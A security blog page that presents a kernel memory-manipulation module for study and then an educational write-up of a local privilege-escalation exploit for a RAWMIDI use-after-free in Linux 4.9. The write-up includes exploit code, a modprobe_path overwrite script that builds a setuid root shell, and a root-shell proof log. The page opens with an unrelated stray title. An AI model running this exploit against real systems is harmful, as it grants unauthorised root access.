Intigriti XSS Challenge – December 2021
KRWX: Kernel Read Write Execute
Introduction
Github project: https://github.com/kiks7/KRWX
During the last few months/year I was studying and approaching the Kernel Exploitation subject and during this journey I developed few tools that assissted me (and currently assist) on better understanding specific topics. Today I want to release my favourine one: KRWX (Kernel Read Write Execute). It is a simple LKM (Linux Kernel Module) that lets you play with kernel memory, allocate and free kernel objects directly from user-land!
What
The main goal of this tool is to use kernel functions from userland (from C code) in order to avoid slower kernel debugging and developing of kernel modules to demostrate specific vulnerabilities (instead, you can emulate them with provided IOCTLs). Also, it can assist the exploitation phase.
These are the project main features (all these features are accessible from a low level user from user-land):
- Read and write into kernel memory
- Read entire blocks of memory
- Arbitrary allocate objects directly calling
kmalloc
- Arbitrary
kfree
objects (and also free arbitrary addresses, if you want) - Allocate/free multiple objects
- Log every
copy_[from|to]_user
/kmalloc
/kfree
called by the KRWX module through hooking (readable fromdmesg
).
Mainly, a more powerful read and write primitive :]
Why
Initially I was writing this module to study the SLUB memory allocator in Linux by allocating, freeing and re-allocating arbitrary chunks easily from an userland process. That automatically leads to study also some exploitation techniques that, with this module, I found a lot easier to understand since you can easily play with kernel memory as you are the god of your system. Then I started to heavily use it for multiple purposes and that’s the reason why I’m sharing it.
How
These are some exported functions:
-
void* kmalloc(size_t arg_size, gfp_t flags)
-> Allocate a chunk with specificsize
andflag
options. -
int kfree(void* address)
-> Free arbitrary chunks by theiraddress
(also, you can free arbitrary memory). -
unsigned long int kread64(void* address)
-> Read 8 bytes of memory ataddress
. -
int kwrite64(void* address, uint64_t value)
-> Write 8 bytes specified byvalue
intoaddress
. -
void read_memory(void* start_address, size_t size)
-> Readsize
amount of memory starting fromstart_address
.
And, since one of my favourite hobby is overengineer and I’m lazy enough to do not want to write loops everytime:
-
void multiple_kmalloc(void** array, uint32_t n_objs, uint32_t size)
-> Allocaten_objs
number of objects with specifiedsize
and return addresses inarray
. -
void multiple_kfree(void** array, uint64_t to_free[], uint64_t to_free_size)
-> Free specified addresses into_free
fromarray
(to_free_size
is the size of theto_free
array). If you’re interested in the source code feel free to check out the github project.
Examples
Allocate, free and read arbitrary chunks
You can find the full source code in example/01.c
. Here will follows some snippets and a little walkthrough.
First, include the external library and call its initialization function (init_krwx
):
#include "./lib/krwx.h"
int main(){
init_krwx();
[..]
}
So, 10 chunks with size 256 are allocated using multiple_kmalloc
, and the memory of the 7th allocation is read using read_memory
after writing 0x4141414141414141
at its first bytes:
void* chunks[10];
multiple_kmalloc(&chunks, 10, 256);
kwrite64(chunks[7], 0x4141414141414141);
read_memory(chunks[7], 0x10);
The indexes 3, 4 and 7 of the chunks
array are freed using multiple_kfree
:
uint64_t to_free[] = {3, 4, 7};
multiple_kfree(&chunks, &to_free, ( sizeof(to_free) / sizeof(uint64_t) ) );
Once they are freed, new chunks with the same size are allocated and initialized with 0x4343434343434343
, and the memory of the 7h freed chunk is displayed using read_memory
again:
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
kwrite64(kmalloc(256, _GFP_KERN), 0x4343434343434343);
read_memory(chunks[7], 0x10);
The result is:
[*] Allocating 10 chunks with size 256
[*] Allocated @0xffffffc00503b900
[*] Allocated @0xffffffc00503b600
[*] Allocated @0xffffffc00503b100
[*] Allocated @0xffffffc00503bc00
[*] Allocated @0xffffffc00503b400
[*] Allocated @0xffffffc00503b000
[*] Allocated @0xffffffc00503b500
[*] Allocated @0xffffffc00503b800
[*] Allocated @0xffffffc00503ba00
[*] Allocated @0xffffffc00503bd00
0xffffffc00503b800: 0x4141414141414141 0xffffffc0001a8928
[*] Freeing @0xffffffc00503bc00
[*] Freeing @0xffffffc00503b400
[*] Freeing @0xffffffc00503b800
0xffffffc00503b800: 0x4343434343434343 0xffffffc0001a8928
With few lines of code has been demostrated how our 7th chunk has been replaced with a new one after it has been freed (the read_memory
targeted the chunks[7]
).
As simple as it is, it has been written for demonstration purposes.
Use-After-Free
To simulate a UAF scenario it’s simple as few lines of code:
void* chunk = kmalloc(<SIZE>, <FLAGS>);
kfree(chunk);
// Allocate your target chunk
// Simulate UAF using k[write|read]64()
For example, if we want to simulate an attack scenario where we want to replace our vulnerable freed chunk with a target object (for example an iovec
struct) we can allocate a chunk with kmalloc
and later kfree
it just before allocating the target structure:
// Allocate the vulnerable object
void* chunk = kmalloc(150, _GFP_KERN);
// Allocate target object
struct iovec iov[10] = {0};
char iov_buf[0x100];
iov[0].iov_base = iov_buf;
iov[0].iov_len = 0x1000;
iov[1].iov_base = iov_buf;
iov[1].iov_len = 0x1337;
int pp[2];
pipe(pp);
if(!fork()){
kfree(chunk); // Freeing the chunk just before allocating the iovec
readv(pp[0], iov, 10); // allocate iovec and blocks (keeping the object in the kernel)
exit(0);
}
sleep(1); // Give time to the child process
read_memory(chunk, 0x40);
Then, with read_memory
we can show the block of memory in our interest and as you can see from the following output, our arbitrary allocated/freed object has been replaced with the target object:
Allocated chunk @0xffffffc0052c5a00
0xffffffc0052c5a00: 0x0000007fd311ff58 0x0000000000001000
0xffffffc0052c5a10: 0x0000007fd311ff58 0x0000000000001337
0xffffffc0052c5a20: 0x0000000000000000 0x0000000000000000
0xffffffc0052c5a30: 0x0000000000000000 0x0000000000000000
Instead of just print the content, you can simulate a UAF read/write using k[read|write]
and play with it.
The full code of this example can be found in client/example/02.c
Setup
To compile the module change the K
variable in the Makefile
with your compiled kernel root directory and compile with make
, then insmod
.
Conclusions
Personally, I used it to study the SLUB allocator, understand UAF/Heap Overflows/Double Free/userfaultd and some hardening features in the kernel, but it can assist the exploitation phase too or more. Blog posts on some Kernel vulnerabilities and their attack methodologies will follow these months and this module will come useful to demonstrate them. So, stay tuned and enjoy !
PS. The “Execute” part of the name will be a future implementation to control pc/rip
.
Linux Kernel Exploit Development: 1day case study
Introduction
I was searching for a vulnerability that permitted me to practise what I’ve learned in the last period on Linux Kernel Exploitation with a “real-life” scenario. Since I had a week to dedicate my time in Hacktive Security to deepen a specific argument, I decided to search for a public vulnerability without a public exploit to develop it by myself. After a quick introduction on how I found the known vulnerability, I will detail the exploitation phase of a race condition that leads to a Use-After-Free in Linux kernel 4.9.
TL;DR
This blog post has two parts:
- Vulnerability hunting: About public resources to identify known vulnerabilities in the Linux Kernel in order to practise some Kernel Exploitation in a real-life scenario. These resources includes: BugZilla, SyzBot, changelogs and git logs.
-
Kernel Exploitation: The vulnerability is a Race Condition that causes a write Use-After-Free. The race window has been extended using the userfaultd technique handling page faults from user-space and using
msg_msg
to leak a kernel address and I/O vectors to obtain a write primitive. With the write primitive, themodprobe_path
global variable has been overwritten and a root shell popped.
Public bugs
The first thing I asked myself was: how do I find a suitable bug for my purpose? I excluded searching it by CVE since not all vulnerabilities have an assigned CVE (and usually they are the most “famous” ones) and that’s when I used the most powerful hacking skill: googling. That led me to various resources that I would like to share today starting by saying that that’s only the result of my personal work that could not reflect the best way to perform the same job. That said, this is what I’ve used to find my “matched” Nday:
- Bugzilla
- SyzBot
- Changelogs
- Git log
Kernel changelogs is definetly my favourite one but let’s say few words on all of them.
BugZilla
BugZilla is the standard way to report bugs in the upstream Linux kernels. You can find interesting vulnerabilities organised by subsystem (e.g. Networking with IPv4 and IPv6 or file system with ext* types and so on) and you can also search for keywords (such as “overflow”, “heap”, “UAF” and so on ..) using the standard search or the more advanced one. The personal downside is the mix of a lot of “non vulnerabilities”, hangs and stuff like that. Also, you do not have the most powerful search options (e.g. some bash). However, it is still a good option and I personally pinned few vulnerabilities that i excluded afterwards.
Syzbot
“syzbot is a continuous fuzzing/reporting system based on syzkaller fuzzer” (Introducing the syzbot dashboard).
Not the best GUI but at least you can have a lot of potentially open and fixed vulnerabilties. There isn’t a built-in search option but you can use your browser’s one or parse the HTML with an HTML parser. One of the downside, beyond the lack of searching, is the presence of tons of false-positives (in the “Open section”). However, upsides are pretty good: you can find open vulnerabilites (still not fixed), reproducers (C or syzlang), fixed commits and reported issues have the syzkaller nomenclature that is pretty self-explainationary.
Syzkaller-bugs (Google Group)
The lack of a search functionality in syz-bot is well replaced by the “syzkaller-bugs” Google Group from where you can find syz-bot reported bugs with additional information from the comment section and an enanched search bar. I really enjoy this option !
Changelogs
That’s my favourite method: download all changelogs from the kernel CDN of your desired kernel version and you can enjoy all downloaded files with your favourite bash commands. This approach is similar to search from git commits but with the advantage that it is way faster. With some bash-fu, you can download all changelogs for a target kernel version (e.g. 4.x) with the following inline: URL=https://cdn.kernel.org/pub/linux/kernel/v4.x/ && curl $URL | grep "ChangeLog-4.9" | grep -v '.sign' | cut -d "\"" -f 2 | while read line; do wget "$URL/$line"; done
.
Once all changelogs have been downloaded it’s possible to grep
for juicy keywoards like UAF, OOB, overflow and so on. I found very useful to display text before and after the selected keyword, like: grep -A5 -B5 UAF *
. In that way, you can instantly have quick information about vulnerability details, impacted subsystem, limitations, ..
For each identified vulnerability, it’s possible to see its patch by diffing the patch commit with the previous one (linux source from git is needed): git diff <commit before> <commit patch>
.
Git log
As said before, this is a similar approach to the “Changelogs” method. The concept is pretty simple: clone the github repository and search for juicy keywoards in the commit history. You can do that with the following commands:
git clone git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
cd linux-stable
git checkout -f <TAG -> # e.g. git checkout -f v4.9.316 (from https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git)
git log > ../git.log
In that way, you can do the same thing as before on git.log
file. The big downside, however, is that the file is too big and it takes more time (11.429.573 lines on 4.9.316). That’s the reason why I prefer the “Changelog” method.
Hunt for a good vulnerability
I was searching for an Use-After-Free vulnerability and I started to search for it in all mentioned resources: BugZilla, SyzBot, Changelogs and git history. I wrote them down in a table with a resume description in order to further analyze them later on. I started to dig into few of them viewing their patch and source code in order to understand reachability, compile dependencies and exploitability. I strumbled into an interesting one: a vulnerability in the RAWMIDI interface (commit c13f1463d84b86bedb664e509838bef37e6ea317). I discovered it with the “Changelog” method, by searching for the “UAF” keyword reading the previous and next five lines: grep -A5 -B5 UAF *
. By seeing its behaviours, I was convinced to go with that vulnerability, an Use-After-Free triggered in a race condition.
RAWMIDI interface
Before facing the vulnerability, let’s see few important things needed to follow this write-up. The vulnerable driver is exposed as a character device in /dev/snd/midiC0D*
(or similar name based on the platform) and depends on CONFIG_SND_RAWMIDI. It exposes the following file operations:
// https://elixir.bootlin.com/linux/v4.9.224/source/sound/core/rawmidi.c#L1507
static const struct file_operations snd_rawmidi_f_ops =
{
.owner = THIS_MODULE,
.read = snd_rawmidi_read,
.write = snd_rawmidi_write,
.open = snd_rawmidi_open,
.release = snd_rawmidi_release,
.llseek = no_llseek,
.poll = snd_rawmidi_poll,
.unlocked_ioctl = snd_rawmidi_ioctl,
.compat_ioctl = snd_rawmidi_ioctl_compat,
};
The ones we are interesed into are open
, write
and unlocked_ioctl
.
open
The open (snd_rawmidi_open) operation allocates everything needed to interact with the device, but what is just necessary to know for us is the first allocation of snd_rawmidi_runtime->buffer
as GFP_KERNEL
with a size of 4096 (PAGE_SIZE) bytes. This is the snd_rawmidi_runtime struct:
struct snd_rawmidi_runtime {
struct snd_rawmidi_substream *substream;
unsigned int drain: 1, /* drain stage */
oss: 1; /* OSS compatible mode */
/* midi stream buffer */
unsigned char *buffer; /* buffer for MIDI data */
size_t buffer_size; /* size of buffer */
size_t appl_ptr; /* application pointer */
size_t hw_ptr; /* hardware pointer */
size_t avail_min; /* min avail for wakeup */
size_t avail; /* max used buffer for wakeup */
size_t xruns; /* over/underruns counter */
/* misc */
spinlock_t lock;
wait_queue_head_t sleep;
/* event handler (new bytes, input only) */
void (*event)(struct snd_rawmidi_substream *substream);
/* defers calls to event [input] or ops->trigger [output] */
struct work_struct event_work;
/* private data */
void *private_data;
void (*private_free)(struct snd_rawmidi_substream *substream);
};
write
After having allocated everything from the open
operation, we can write into the file descriptor like write(fd, &buf, 10)
. In that way, it will fill 10 bytes into the snd_rawmidi_runtime->buffer
and using snd_rawmidi_runtime->appl_ptr
it will remember the offset to start writing again later.
In order to write into that buffer, the driver does the following calls: snd_rawmidi_write => snd_rawmidi_kernel_write1 => copy_from_user
ioctl
The snd_rawmidi_ioctl is responsible to handle IOCTL commands and the one we are interested in is SNDRV_RAWMIDI_IOCTL_PARAMS
that calls snd_rawmidi_output_params with user-controllable parameter:
int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
struct snd_rawmidi_params * params)
{
// [..] few checks
if (params->buffer_size != runtime->buffer_size) {
newbuf = kmalloc(params->buffer_size, GFP_KERNEL); //[1]
if (!newbuf)
return -ENOMEM;
spin_lock_irq(&runtime->lock);
oldbuf = runtime->buffer;
runtime->buffer = newbuf; // [2]
runtime->buffer_size = params->buffer_size;
runtime->avail = runtime->buffer_size;
runtime->appl_ptr = runtime->hw_ptr = 0;
spin_unlock_irq(&runtime->lock);
kfree(oldbuf); //[3]
}
// [..]
}
This IOCTL is crucial for this vulnerability. With this command it’s possible to re-size the internal buffer with an arbitrary value reallocating it[1] and later replace that buffer with the older one [2], that will be freed[3].
Vulnerability Analysis
The vulnerability has been patched by the commit “c13f1463d84b86bedb664e509838bef37e6ea317” that introduced a reference counter on the targeted vulnerable buffer. In order to understand where the vulnerbility lived it’s a good thing to see its patch:
diff --git a/include/sound/rawmidi.h b/include/sound/rawmidi.h
index 5432111c8761..2a87128b3075 100644
--- a/include/sound/rawmidi.h
+++ b/include/sound/rawmidi.h
@@ -76,6 +76,7 @@ struct snd_rawmidi_runtime {
size_t avail_min; /* min avail for wakeup */
size_t avail; /* max used buffer for wakeup */
size_t xruns; /* over/underruns counter */
+ int buffer_ref; /* buffer reference count */
/* misc */
spinlock_t lock;
wait_queue_head_t sleep;
diff --git a/sound/core/rawmidi.c b/sound/core/rawmidi.c
index 358b6efbd6aa..481c1ad1db57 100644
--- a/sound/core/rawmidi.c
+++ b/sound/core/rawmidi.c
@@ -108,6 +108,17 @@ static void snd_rawmidi_input_event_work(struct work_struct *work)
runtime->event(runtime->substream);
}
+/* buffer refcount management: call with runtime->lock held */
+static inline void snd_rawmidi_buffer_ref(struct snd_rawmidi_runtime *runtime)
+{
+ runtime->buffer_ref++;
+}
+
+static inline void snd_rawmidi_buffer_unref(struct snd_rawmidi_runtime *runtime)
+{
+ runtime->buffer_ref--;
+}
+
static int snd_rawmidi_runtime_create(struct snd_rawmidi_substream *substream)
{
struct snd_rawmidi_runtime *runtime;
@@ -654,6 +665,11 @@ int snd_rawmidi_output_params(struct snd_rawmidi_substream *substream,
if (!newbuf)
return -ENOMEM;
spin_lock_irq(&runtime->lock);
+ if (runtime->buffer_ref) {
+ spin_unlock_irq(&runtime->lock);
+ kfree(newbuf);
+ return -EBUSY;
+ }
oldbuf = runtime->buffer;
runtime->buffer = newbuf;
runtime->buffer_size = params->buffer_size;
@@ -962,8 +978,10 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
long result = 0, count1;
struct snd_rawmidi_runtime *runtime = substream->runtime;
unsigned long appl_ptr;
+ int err = 0;
spin_lock_irqsave(&runtime->lock, flags);
+ snd_rawmidi_buffer_ref(runtime);
while (count > 0 && runtime->avail) {
count1 = runtime->buffer_size - runtime->appl_ptr;
if (count1 > count)
@@ -982,16 +1000,19 @@ static long snd_rawmidi_kernel_read1(struct snd_rawmidi_substream *substream,
if (userbuf) {
spin_unlock_irqrestore(&runtime->lock, flags);
if (copy_to_user(userbuf + result,
- runtime->buffer + appl_ptr, count1)) {
- return result > 0 ? result : -EFAULT;
- }
+ runtime->buffer + appl_ptr, count1))
+ err = -EFAULT;
spin_lock_irqsave(&runtime->lock, flags);
+ if (err)
+ goto out;
}
result += count1;
count -= count1;
}
+ out:
+ snd_rawmidi_buffer_unref(runtime);
spin_unlock_irqrestore(&runtime->lock, flags);
- return result;
+ return result > 0 ? result : err;
}
long snd_rawmidi_kernel_read(struct snd_rawmidi_substream *substream,
@@ -1262,6 +1283,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
return -EAGAIN;
}
}
+ snd_rawmidi_buffer_ref(runtime);
while (count > 0 && runtime->avail > 0) {
count1 = runtime->buffer_size - runtime->appl_ptr;
if (count1 > count)
@@ -1293,6 +1315,7 @@ static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream,
}
__end:
count1 = runtime->avail < runtime->buffer_size;
+ snd_rawmidi_buffer_unref(runtime);
Two functions were added: snd_rawmidi_buffer_ref and snd_rawmidi_buffer_unref. They are respectively used to take and remove a reference to the buffer using snd_rawmidi_runtime->buffer_ref
when it is copying (snd_rawmidi_kernel_read1) or writing (snd_rawmidi_kernel_write1) into that buffer. But why this was needed? Because read and write operations handled by snd_rawmidi_kernel_write1 and snd_rawmidi_kernel_read1 temporarly unlock the runtime lock during the copying from/to userspace using spin_unlock_irqrestore
[1]/spin_lock_irqrestore
[2] giving a small race window where the object can be modified during the copy_from_user
call:
static long snd_rawmidi_kernel_write1(struct snd_rawmidi_substream *substream, const unsigned char __user *userbuf, const unsigned char *kernelbuf, long count) {
// [..]
spin_unlock_irqrestore(&runtime->lock, flags); // [1]
if (copy_from_user(runtime->buffer + appl_ptr,
userbuf + result, count1)) {
spin_lock_irqsave(&runtime->lock, flags);
result = result > 0 ? result : -EFAULT;
goto __end;
}
spin_lock_irqsave(&runtime->lock, flags); // [2]
// [..]
}
If a concurrent thread re-allocate the runtime->buffer
using the SNDRV_RAWMIDI_IOCTL_PARAMS
ioctl, that thread can lock the object from spin_lock_irq
[1] (that has been left unlocked in the small race window given by snd_rawmidi_kernel_write1
) and free that buffer[2], making possible to re-allocate an arbitrary object and write on that. Also, the kmalloc
[3] in snd_rawmidi_output_params
is called with params->buffer_size
that is totally user controllable.
int `snd_rawmidi_output_params`(struct snd_rawmidi_substream *substream,
struct snd_rawmidi_params * params)
{
// [..]
if (params->buffer_size != runtime->buffer_size) {
newbuf = kmalloc(params->buffer_size, GFP_KERNEL); // [3]
if (!newbuf)
return -ENOMEM;
spin_lock_irq(&runtime->lock); // [1]
oldbuf = runtime->buffer;
runtime->buffer = newbuf;
runtime->buffer_size = params->buffer_size;
runtime->avail = runtime->buffer_size;
runtime->appl_ptr = runtime->hw_ptr = 0;
spin_unlock_irq(&runtime->lock);
kfree(oldbuf); // [3]
}
// [..]
}
What happen if, while a thread is writing into the buffer with copy_from_user
, another thread frees that buffer using the SNDRV_RAWMIDI_IOCTL_PARAMS
ioctl and reallocates a new arbitrary one? The object is replaced with an new one and the copy_from_user
will continue writing into another object (the “victim object”) corrupting its values => User-After-Free (Write).
The really good part about this vulnerability is the “freedom” you can have:
- It’s possible to call
kmalloc
with an arbitrary size (and this will be the freed object that we are going to replace to cause a UAF) which means that we can target our favourite slab cache (based on what we need, ofc) - We can write as much as we want in the buffer with the
write
syscall
Extend the Race Time Window
We know we have a small race window with few instructions while copying data from userland to kernel as explained before, but the great news is that we have a copy_from_user
that can be suspended arbitrarly handling page fault in user-space ! Since I was exploiting the vulnerability in a 4.9 kernel (4.9.223) and hence userfaultd is still not unprivileged as in >5.11, we can still use it to extend our race window and have the necessary time to re-allocate a buffer!
Exploitation Plan
We stated that we are going to use the userfaultd technique to extend the time window. If you are new to this technique is well explained here, in this video (you can use substitles) and here. To summarize: you can handle page faults from user-land, temporarly blocking kernel execution while handling the page fault. If we mmap
a block of memory with MAP_ANONYMOUS
flag, the memory will be demand-zero paged, meaning that it’s not yet allocated and we can allocate it via userfaultd.
The idea using this technique is:
- Initialize the
runtime->buffer
withopen
=> This will allocate the buffer with 4096 size (that will land inkmalloc-4096
) - Send
SNDRV_RAWMIDI_IOCTL_PARAMS
ioctl command in order to re-allocate the buffer with our desired size (e.g. 30 wil land inkmalloc-32
) - Allocate with
mmap
a demand-zero paged (MAP_ANON
) and initializeuserfaultd
to handle its page fault -
write
to the rawmidi file descriptor using our previously allocated mmaped memory => This will trigger the userland page fault incopy_from_user
- While the kernel thread is suspended waiting for the userland page fault we can send again the
SNDRV_RAWMIDI_IOCTL_PARAMS
in order to free the currentruntime->buffer
- We allocate an object in, for example,
kmalloc-32
and if we did some spray before on that cache it will take the place of the previous freedruntime->buffer
- We release the page fault from userland and the
copy_from_user
will continue writing its data (totally in user control) to the new allocated object
With this primitive, we can forges arbitrary objects with arbitrary size (specified in the write
syscall), arbitrary content, arbitrary offset (since we can trigger userfaultd between two pages as demostrated later on) and arbitrary cache (we can control the size allocation in the SNDRV_RAWMIDI_IOCTL_PARAMS
ioctl).
As you can deduce, we have a really great and powerful primitive !
Information Leak
Victim Object
We are going to use what we previously explained in the “Exploitation Plan” section to leak an address that we will re-use to have an arbitrary write. Since we can choose which cache trigger the UAF on (and that’s gold from an exploitation point of view) I choose to leak the shm_file_data->ns
pointer that points to init_ipc_ns
in the kernel .data
section and it lives in kmalloc-32
(I also used the same function to spray the kmalloc-32
cache):
void alloc_shm(int i)
{
int shmid[0x100] = {0};
void *shmaddr[0x100] = {0};
shmid[i] = shmget(IPC_PRIVATE, 0x1000, IPC_CREAT | 0600);
if (shmid[i] < 0) errExit("shmget");
shmaddr[i] = (void *)shmat(shmid[i], NULL, SHM_RDONLY);
if (shmaddr[i] < 0) errExit("shmat");
}
alloc_shm(1)
From that pointer, we will deduce the pointer of modprobe_path
in order to use that technique later to elevate our privileges.
msg_msg
struct msg_msg {
struct list_head m_list;
long m_type;
size_t m_ts; /* message text size */
struct msg_msgseg *next;
void *security;
/* the actual message follows immediately */
};
struct msg_msgseg {
struct msg_msgseg *next;
/* the next part of the message follows immediately */
};
In order to leak that address, however, we have to compromise some other object in kmalloc-32
, maybe a length field that would read after its own object. For that case, msg_msg
is our perfect match because it has a length field specified in its msg_msg->m_ts
and it can be allocated in almost any cache starting from kmalloc-32
to kmalloc-4096
, with just one downside: The minimun allocation for the msg_msg
struct is 48 (sizeof(struct msg_msg)
) and it can lands minimun at kmalloc-64
.
If you want to read more about this structure you can checkout Fire of Salvation Writeup, Wall Of Perdition and the kernel source code.
However, when a message is sent using msgsnd
with size more than DATALEN_MSG (((size_t)PAGE_SIZE-sizeof(struct msg_msg))
) that is 4096-48, a segment (or multiple segments if needed) is allocated, and the message is splitted between the msg_msg
(the payload is just after the struct headers) and the msg_msgseg
, with the total size of the message specified in msg_msg->m_ts
.
In order to allocate our target object in kmalloc-32
we have to send a message with size: ( ( 4096 – 48 ) + 10 ).
- The
msg_msg
structure will be allocated inkmalloc-4096
and the first (4096 – 48) bytes will be written in themsg_msg
structure. - To allocate the remaining 10 bytes, a segment
msg_msgseg
will be allocated inkmalloc-32
With these conditions, we can forge the msg_msg
structure in kmalloc-4096
overwriting its m_ts
value with our UAF and with msgrcv
we can receive a message that will contains values past our segment allocated in kmalloc-32
(including our targeted init_ipc_ns
pointer).
Dealing with offsets
However, we want to overwrite the m_ts
value without overwriting anything else in the msg_msg
structure, how we can do that?
If you remember, I said we can overwrite chunks with arbitrary size, content and offset. If we create a mmap
memory with size PAGE_SIZE * 2
(two pages) and we handle the page fault only for the second page, we can start writing into the original runtime->buffer
and trigger the page fault when it receives the msg_msg->m_ts
offset (0x18). Now that the kernel thread is blocked, it’s possible to replace the object with msg_msg
and when the copy_from_user
resumes, it will starts writing exactly at the msg_msg->m_ts
value the remaining bytes. The size we are writing into the file descriptor is (0x18 + 0x2) since the first 0x18 bytes will be used to land at the exact offset and the 2 remaining bytes will write 0xffff
in msg_msg->m_ts
. The concept is also explained in the following picture:

Now from the received message from msgrcv
we can retrieve the init_ipc_ns
pointer from shm_file_data
and we can deduce the modprobe_path
address calculating its offset and proceed with the arbitrary write phase.
Arbitrary Write
In order to write at arbitrary locations we are using the same userfault technique described above but instead of targeting msg_msg
we will use the Vectored I/O (pipe
+ iovec
) primitive. This primitive has been fixed in kernel 4.13 with copyin and copyout wrappers, with an access_ok
addition. This technique has been widely used exploiting the Android Binder CVE-2019-2215 and is well detailed here and here.
The idea is to trigger the UAF once again but targeting the iovec struct:
struct iovec
{
void __user *iov_base; /* BSD uses caddr_t (1003.1g requires void *) */
__kernel_size_t iov_len; /* Must be size_t (1003.1g) */
};
The minimun allocation for iovec
occurs with sizeof(struct iovec) * 9
or 16 * 9
(144) that will land at kmalloc-192
(otherwise it is stored in the stack). However I choose to allocate 13 vectors using readv
to make the object land in kmalloc-256
.
int pipefd[2];
pipe(pipefd)
// [...]
struct iovec iov_read_buffers[13] = {0};
char read_buffer0[0x100];
memset(read_buffer0, 0x52, 0x100);
iov_read_buffers[0].iov_base = read_buffer0;
iov_read_buffers[0].iov_len= 0x10;
iov_read_buffers[1].iov_base = read_buffer0;
iov_read_buffers[1].iov_len= 0x10;
iov_read_buffers[8].iov_base = read_buffer0;
iov_read_buffers[8].iov_len= 0x10;
iov_read_buffers[12].iov_base = read_buffer0;
iov_read_buffers[12].iov_len= 0x10;
if(!fork()){
ssize_t readv_res = readv(pipefd[0], iov_read_buffers, 13); // 13 * 16 = 208 => kmalloc-256
exit(0);
}
The readv
is a blocking call that stays (does not free) the object in the kernel so that we can corrupt it using our UAF and re-use it later with our arbitrary modified content. If we corrupt the iov_base
of an iovec
structure we can write at arbitrary kernel addresses with a write
syscall since it is uses the unsafe __copy_from_user (same as copy_from_user
but without checks).

Our idea is:
- Resize the
runtime->buffer
withSNDRV_RAWMIDI_IOCTL_PARAMS
in order to lands intokmalloc-256
with a size greater than 192 -
write
into the file descriptor specifycing a demanded-zero paged memory (MAP_ANON
) so thatcopy_from_user
will stop its execution waiting for our user-land page fault handler - While the kernel thread is waiting, free the buffer using again the re-size ioctl command
SNDRV_RAWMIDI_IOCTL_PARAMS
- Allocate the
iovec
struct usingreadv
that will replace the previously allocatedruntime->buffer
- Resume the kernel execution releasing the page fault handler. Now the
copy_from_user
will start to write into theiovec
structure and we will overwriteiov[1].iov_base
with themodprobe_path
address.
Now, in order to overwrite the modprobe_path
value we just have to write our arbitrary content using the write
syscall into pipe[0]
. In the released exploit I overwrote the second iov entry (iov[1]
) using the same technique described before with adjacent pages. However, it’s also possible to directly overwrite the first iov[0].iov_base
.
Nice ! Now we have overwritten modprobe_path
with /tmp/x
and .. it’s time to pop a shell !
modprobe_path & uid=0
If you are not familiar with modprobe_path
I suggest you to check out Exploiting timerfd_ctx Objects In The Linux Kernel and the man page.
To summarize, modprobe_path
is a global variable with a default value of /sbin/modprobe
used by call_usermodehelper_exec
to execute a user-space program in case a program with an unkown header is executed.
Since we have overwritten modprobe_path
with /tmp/x
, when a file with an unknown header is executed, our controllable script is executed as root.
These are the exploit functions that prepares and later executes a suid shell:
void prep_exploit(){
system("echo '#!/bin/sh' > /tmp/x");
system("echo 'touch /tmp/pwneed' >> /tmp/x");
system("echo 'chown root: /tmp/suid' >> /tmp/x");
system("echo 'chmod 777 /tmp/suid' >> /tmp/x");
system("echo 'chmod u+s /tmp/suid' >> /tmp/x");
system("echo -e '\xdd\xdd\xdd\xdd\xdd\xdd' > /tmp/nnn");
system("chmod +x /tmp/x");
system("chmod +x /tmp/nnn");
}
void get_root_shell(){
system("/tmp/nnn 2>/dev/null");
system("/tmp/suid 2>/dev/null");
}
int main(){
prep_exploit();
// [..] exploit stuff
get_root_shell(); // pop a root shell
}
What the exploit does is simply create the /tmp/x
binary that will suid as root a file dropped in /tmp/suid
and create a file with an unknown header (/tmp/nnn
) that will trigger the executon as root of /tmp/x
from call_usermodehelper_exec
. After that, the /tmp/suid
gives root privileges and spawns a root shell.
POC:
/ $ uname -a
Linux (none) 4.9.223 #3 SMP Wed Jun 1 23:15:02 CEST 2022 x86_64 GNU/Linux
/ $ id
uid=1000(user) gid=1000 groups=1000
/ $ /main
[*] Starting exploitation ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to 4096 ..
[*] snd_write triggered (should fault)
[*] Freeing buf using SNDRV_RAWMIDI_IOCTL_PARAMS
[+] Page Fault triggered for 0x5551000!
s -l[*] Replacing freed obj with msg_msg .
[*] Waiting for userfaultd to finish ..
[*] Page fault thread terminated
[+] Page fault lock released
[+] init_ipc_ns @0xffffffff81e8d560
[+] calculated modprobe_path @0xffffffff81e42a00
[+] Starting the arbitrary write phase ..
[*] Closing and reopening re-opening rawmidi fd ..
[+] userfaultfd registered
[*] First write to init substream..
[*] Resizing buffer_size to land into kmalloc-256 ..
[*] snd_write triggered (should fault)
[*] Freeing buf from SNDRV_RAWMIDI_IOCTL_PARAMS
[+] Page Fault triggered for 0x7771000!
[*] Waiting for readv ..
[*] Page fault thread terminated
[+] Page fault lock released
[*] Writing into the pipe ..
[*] write = 24
[+] enjoy your r00t shell [:
/ # id
uid=0(root) gid=0 groups=1000
/ #
Conclusion
I illustrated my experience on finding a public vulnerability using public resources to practise some linux kernel exploitation. Once identified a good candiate, I developed the exploit for a 4.9 kernel achieving arbitrary read and write. With tese primitives, a root shell was spawned.
You can find the whole exploit here: https://github.com/kiks7/CVE-2020-27786-Kernel-Exploit
References
- https://bugzilla.kernel.org/
- https://www.kernel.org/doc/html/v4.19/admin-guide/reporting-bugs.html
- https://lwn.net/Articles/749910/
- https://groups.google.com/g/syzkaller-bugs/
- https://cdn.kernel.org/pub/linux/kernel/
- https://elixir.bootlin.com/linux/v4.9.223/source/
- https://lwn.net/Articles/819834/
- https://www.youtube.com/watch?v=6dFmH_JEF4s
- https://blog.lizzie.io/using-userfaultfd.html
- https://www.willsroot.io/2021/08/corctf-2021-fire-of-salvation-writeup.html
- https://syst3mfailure.io/wall-of-perdition
- https://googleprojectzero.blogspot.com/2019/11/bad-binder-android-in-wild-exploit.html
- https://cloudfuzz.github.io/android-kernel-exploitation/chapters/exploitation.html#leaking-task-struct-pointer
